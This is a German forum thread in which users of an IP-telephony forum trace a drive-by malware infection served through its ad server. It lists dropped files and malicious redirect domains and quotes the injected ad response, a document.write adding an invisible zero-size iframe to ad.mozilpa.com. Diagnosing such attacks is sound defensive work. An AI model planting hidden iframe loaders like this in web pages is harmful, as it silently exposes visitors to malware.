Verseuchte Seite

[indigoboy]

Bei mir wird versucht per Java ein Virus einzuschleusen. Per SMB soll auf \\takstogo.com\smb\new.avi zugriffen werden. SMB ins Internet blockt aber meine Firewall:

Könnt ihr die Werbung nicht mal komplett deaktivieren? Dann könnte man feststellen ob das tatsächlich per Werbung ausgeliefert wird?

Gruß Indigo

 

[sven@mainz]

Ich habe gerade mal aaa.losnigerad.com eingegeben und da steht: Seite im Aufbau. Also scheinbar nur zum Hosten von solchen Dingen erstellt. Und die komplette Url von Dir redirectet auf Google.com. Sehr seltsam.

 

[3949354]

Kann es sein, dass diese Java-Atacken, ich nenne sie einmal so, nicht konstant eingerichtet sind, sondern auch regel- unregelmäßig da- / aktiviert werden? Das Problem scheint ja nicht reproduzierbar und nur sporadisch aufzutreten. Das spräche für ein gewisses Zeitintervall.
Keine Ahnung ob das möglich ist, aber ich greife einfach einmal ins Leere.

 

[RalfFriedl]

Klar ist es möglich, das nur zu gewissen Zeiten zu aktivieren.
Noch wahrscheinlicher ist, daß in Abhängigkeit vom Referrer verschiedene Inhalte ausgeliefert werden.

 

[MikeB]

Ja, genau so sehe ich das auch. Fakt ist nunmehr dass ich wohl mit FF und aktiviertem ABP Ruhe davor habe, der Preis ist, das Forum bekommt von mir so keine Werbeeinnahmen. Diese Chinesische Website müsste irgendwie geblockt werden, wie man das bewerkstelligen könnte weiß ich leider auch nicht.

 

[sven@mainz]

Ja, zum Teil sind das Seiten, die gezielt manchmal das Zeugs ausliefern und dann wieder nicht. Das läßt sich per Fernsteuerung wohl abschalten und dann hat die Schadsoftware wohl auch noch diverse Sicherungen drin, daß die sich still verhält.

Da hab ich vor ein paar Tagen mal irgendwo einen Artikel gelesen, wo jemand mal den Seitenquelltext auseinandergenommen hat. War ganz interessant, wie versteckt die eigentliche Nachladefunktion versteckt war. Link habe ich auf die Schnelle nicht bei der Hand, war glaube ich bei Heise.de.

 

[flox]

... mal irgendwo einen Artikel gelesen ...

Das war "Tatort Internet: Alarm beim Pizzadienst" auf heise security
http://www.heise.de/security/artikel/Tatort-Internet-Alarm-beim-Pizzadienst-1017983.html

 

[sven@mainz]

Danke, ich wollte gerade den Link auch reinstellen, weil ich es gefunden habe.

 

[3949354]

Vielleicht ja ein Ansatz. Dann aber die Frage: von welcher Werbung kümmt das Ding?

 

[Blackvel]

tatsächlich versuche Einstiegsseite index.php

Hallo Leute,

die IPPF Seite (ip-phone-forum.de/index.php) ist datsächlich versucht.

Es installieren sich automatisch Programme bei IE7 im Hintergrund, die CMD.EXE DOS-Box wird gelauncht und nun versuchen ominöse Programme die Verbindung nach außen aufzubauen (AntiVir Firewall blockiert und frägt).
Zudem Windows Hilfe und Support Center wird geöffnet. Ja wie das denn?

Nehmt schleunigst ALLE externen Webseiten von IPPF runter!!!

zyli.exe
ilkys.exe

Untersucht mal den Ordner
C:\Dokumente und Einstellungen\<User>\Anwendungsdaten

Es werden ominöse Ordner wie Rasyap unter falschem Timestamp (2007-Anfang 2010) erzeugt.
z.B Awilp, Ehdae, etc.

Es scheint auch ständig die Datei l.vbs nach Temp herunterzuladen.

 

[3949354]

Ich nutze den FF portable. Meine Firewall (Norman) sowie die Virenscanner Norman und TrendMicro haben sich nicht gemeldet. Werde zu hause, noch im Büro.

Ein SystemScan, der gestern (im Forum) durchgelaufen ist, hätte die Bedrohung doch finden müssen. (Zumindest, wenn eine Datei betroffen ist.)

 

[MikeB]

Ich nehme an die Bedrohung kommt mit einem Werbebanner, dieses kann auch unsichtbar sein, von daher ist es unwahrscheinlich dass das Forum selbst infiziert ist.

Was ich nicht verstehe ist halt, die IP ist bekannt, die Site ist bekannt, wieso gelingt es nicht sie zu blocken, das FF Addon ABP scheint ja die Gefahr zu erkennen und abzublocken. By the way, ein anderes Forum in dem ich unterwegs bin/war, wurde auch mal vor paar Jahren angegriffen, an die Admins/Forumbetreiber, gebe gerne Informationen zu dem Forum und dem Betreiber per PM, nur anfragen, denke ich bin bis heute Abend online.

 

[alfhh]

Vielleicht bringt es ja etwas, wenn es einem User gelänge, einen Screenshot zu fertigen, wenn die Meldung kommt. Vielleicht kann man so ja die "fehlerhafte" Werbung ausfindig machen :noidea:

Habe ich eben gemacht. Unten auf der Seite war noch eine o2 Werbung.

 

[Novize]

alfhh: Links unten vom 1&1-Werbebanner steckt (sogar sichtbar) als kleines Kästchen der Übeltäter - soweit sind wir schon. Dort versteckt sich das Script, das nach "mozilpa.com" verweist, von wo aus eine Weiterleitung erfolgt, die dann im weiteren Schritt das Schei*-Zeug ausliefert. Der eigentliche Werbebanner selbst bleibt davon unberührt. Die Frage ist nur, wer dieses kleine Kästchen dort erzeugt, dann wären wir nämlich am Ziel.
Scheinbar ist die Weiterleitung nach "btomiumgop.com" langsam(?) abgelöst worden von der Weiterleitung nach "losnigerad.com"
@MikeB: ABP kennt das Problem nicht, sondern blockt rigoros alle Werbebanner und damit hat auch das on-the-fly erzeugte kleine Kästchen nicht vorhanden, denn es wird direkt mitgeblockt.
@Blackvel: Weder in unseren Datenbanken noch in der "index.php" ist der Link bzw das Script enthalten, deshalb ist obige Vermutung, dass das Forum bzw der Server gehackt/verseucht ist, falsch. Wir bekommen diesen Mist leider on-the-fly angeliefert, wie die gesamte Werbung auch. Selbst im Cache war nichts zu finden. :noidea:

 

[mikrogigant]

Es installieren sich automatisch Programme bei IE7 im Hintergrund, die CMD.EXE DOS-Box wird gelauncht und nun versuchen ominöse Programme die Verbindung nach außen aufzubauen (AntiVir Firewall blockiert und frägt).
Zudem Windows Hilfe und Support Center wird geöffnet.

Bei dem Rechner, an dem du das getestet hast, solltest du sofort die Internetverbindung trennen und ihn danach komplett neu installieren (bei der Gelegenheit kannst du den veralteten IE 7 auch gleich gegen den IE 8 austauschen). Der Rechner dürfte jetzt bis zum Stehkragen mit Malware zugekleistert sein. Achtung: "Removal-Tools" gleich welcher Art sind wirkungslos! Du bekommst den Rechner nur durch eine komplette Neuinstallation wieder sauber.

Grüßle

Der Mikrogigant

 

[alfhh]

Autsch, den kleinen Punkt habe ich schon länger beobachtet. Nachdem ich aber nicht draufklicken konnte, oder mit Rechtsklick die Bildeigenschaften anzeigen konnte, habe ich das wieder aus den Augen verloren. Auf einem anderen Rechner habe ich zum Teil den Punkt und dann keinen Werbebanner, sondern nur den Text eines Scripts gesehen. Ich denke, ich sollte jetzt alle Rechner mal Scannen Hat jemand irgendwelche Tipps zur Schnelldiagnose?

 

[RalfFriedl]

Links unten vom 1&1-Werbebanner steckt (sogar sichtbar) als kleines Kästchen der Übeltäter - soweit sind wir schon. Dort versteckt sich das Script, das nach "mozilpa.com" verweist, von wo aus eine Weiterleitung erfolgt, die dann im weiteren Schritt das Schei*-Zeug ausliefert.

Bei mir wird für diese Stelle folgender Quelltext angezeigt:

<script type='text/javascript'><!--//<![CDATA[
   var m3_u = (location.protocol=='http:'?'http://www.ip-phone-forum.de/ads/www/delivery/ajs.php':'http://www.ip-phone-forum.de/ads/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=1");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://www.ip-phone-forum.de/ads/www/delivery/ck.php?n=af9bd35b&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://www.ip-phone-forum.de/ads/www/delivery/avw.php?zoneid=1&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=af9bd35b' border='0' alt='' /></a></noscript>

Und unter dem Link [NOPARSE]http://www.ip-phone-forum.de/ads/www/delivery/ajs.php[/NOPARSE] (besser nicht anklicken) kommt folgendes:

document.write('<iframe src="http://ad.mozilpa.com/stats?ref=www.ip-phone-forum.de" width=0 height=0></iframe>');
var OX_74e45eb2 = '';

Diese PHP-Datei wird also von Eurem Server abgerufen, und sie liefert einen IFRAME auf ad.mozilpa.com. Sogar mit Referrer.

 

[3949354]

@Novize

Meintest Du diesen Punkt?

 

[RalfFriedl]

Ich nehme an, er meint den Punkt, der in #93 links unten neben dem Banner ist. Da bei Dir kein Banner zu sehen ist, könnte es durchaus der gleiche Punkt sein.

 

[3949354]

Die Vermutung hatte ich. Das würde allerdings bedeuten, dass das bescheidene Ding auch ohne Banner auftauchen könnte?